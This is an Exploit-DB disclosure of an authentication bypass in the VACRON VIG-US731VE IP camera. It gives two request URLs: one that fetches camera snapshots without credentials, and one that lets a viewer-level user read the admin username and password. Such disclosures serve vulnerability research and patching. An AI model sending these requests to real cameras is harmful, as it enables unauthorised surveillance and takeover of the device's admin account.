VACRON VIG-US731VE 1.0.18-09-B727 IP Camera - Authentication Bypass

EDB-ID:

42352

CVE:

N/A


Author:

Viktoras

Type:

webapps


Platform:

Hardware

Date:

2017-07-20


# Exploit Title: IP Camera VACRON VIG-US731VE
# Date: 2017-07-18
# Exploit Author: anonymous
# Vendor Homepage: www.vacron.com
# Version: V1.0.18-09-B727

1. doesn't require credentials to fetch snapshot like this: http://192.168.0.200/ipcam/jpeg
2. allows "viewer" level user to fetch any camera setting, eg admin user and password: http://192.168.0.200/vb.htm?adminid&adminpwd


there is newer firmware available from the vendor, but I haven't tested on that one.